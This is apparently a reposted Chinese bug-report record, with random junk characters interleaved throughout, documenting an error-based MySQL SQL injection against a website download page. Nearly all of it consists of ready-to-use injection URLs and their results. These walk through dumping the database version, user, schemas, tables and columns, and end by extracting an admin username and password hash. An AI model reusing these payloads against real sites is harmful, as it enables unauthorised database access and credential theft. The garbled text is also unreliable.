http://www.wooyun.org/bugs/wooyun-2010-01666* J# i' V* I- H V* ~* O
; \5 @* x& b4 S# K- h0 o* ]之前想找个测试 没想到这有 可以测试下做个记录而已 + G# K' F! Q& W3 F5 k: i8 G
" q+ n3 B: m1 U7 D6 Z1 Ahttp://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003% Q! s' j: X9 c# Z+ ?. _5 a' D% q
0 [2 Q5 ?. ~ }/ j/data0/htdocs/leqi_new/app/myapp.php
+ s* n. W- Y: q' I7 ]. h# V. [+ p
或者+ j7 D0 l6 q8 p }& ?: s9 o! j. S0 }
9 t: g* I( y( v5 A/ W, Q( ^ \! Q
/**********version()**********/ 5.1.49-log" d9 y4 X# L! I9 W, m6 e0 J
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
0 v! x0 S' i8 e- h. U9 V$ {7 E9 {* w! q% A
/**********user()**********/
, E, ?& A6 e7 f+ s6 V0 x8 h( Dhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
4 Q4 J: J, N- v
1 A% N" `, S9 h- V/**********database()**********/ leqi
2 b7 f$ z8 n, x5 y4 Ghttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0034 r5 I6 n% y- C9 e
, `: ]7 N7 J. N3 b& m0 n! K4 o/**********limit依次递归爆库**********/
8 a7 J' w1 ?: D) C8 dhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
9 `8 U* W" a2 _8 j8 N" kinformation_schema
% k& u3 K: k& d& s. I2 X) {8 khttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003+ t1 Z: G8 _: L/ C( b/ P
leqi
. e" I1 B, L; f1 Q5 zhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
6 C$ m/ P0 f8 c, E- |3 M9 a3 `test
8 D& Q, n4 j& Y: b! i( D2 l' P1 t4 P: C5 e
/**********limit依次递归爆表名**********/
M' x" S$ O# E, T' b4 khttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
! @$ h. {. W( K0 x; zusers
) }7 }0 U% j% i* W) C5 U' D: c0 g0 t; k) G: E( b7 J0 A1 ?% G9 y
/**********limit依次递归爆字段名**********/, }7 b; _/ g( ~7 D! E/ S% P
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0035 v7 k7 W" p, {' d T' o% ^
user_id,username,nickname,passwd,group_id6 g* W1 q* b% q3 v; I( O. X
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23! |: T2 C4 w% v+ O
/wapc/5000_0005_003
0 J3 ~6 Q6 s! G9 c/ k& X/ u( r11 21# B7 `# ~/ O8 [: C4 v8 ^
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
; J, A: z E0 C6 e, ~/wapc/5000_0005_003! }# M* ?' u4 f$ b! W+ ~; E) d# M
11 341 351 361! {8 ~9 P) V. ?* ]" P+ t
/**********爆数据**********/0 A; D3 V* w z2 W5 K
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%236 N7 D; n% V/ w* V
admin p- T* B* t4 u) J
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
# f' H4 _4 r( }) k6a8b4574ca231eb8bd52764d4978ffcd6 u0 f, N3 Z5 n9 a2 I9 Y5 l
9 ?, Q' `/ P% `+ _# x
8 O) C# o: d& X8 [0 U |